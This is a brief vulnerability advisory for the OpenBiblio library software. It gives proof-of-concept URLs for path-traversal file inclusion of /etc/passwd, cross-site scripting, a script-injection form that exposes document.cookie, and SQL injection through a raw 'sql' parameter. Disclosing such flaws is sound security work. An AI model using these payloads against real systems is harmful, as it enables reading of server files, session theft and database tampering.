|
OpenBiblio Multiple Input Validation Vulnerabilities
An attacker can exploit these issues via a browser. To exploit some of these issues, the attacker must entice an unsuspecting victim to follow a malicious URI. The following proofs of concept are available: Local file-include vulnerabilities: http://www.example.com/openbiblio/shared/help.php?page=../../../../../../etc/passwd%00 http://www.example.com/openbiblio/shared/header.php?tab=../../../etc/passwd%00 Cross-site scripting vulnerabilities: http://www.example.com/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS] http://www.example.com/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS] HTML-injection vulnerability: <form action="http://www.example.com/openbiblio/admin/theme_preview.php" method="post"> <input type="text" name="themeName" size="40" value="<script>alert( document.cookie);</script>"><br><br> <input type="submit" value="doit"> </form> SQL-injection vulnerability: http://www.example.com/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++ |
|
|
Privacy Statement |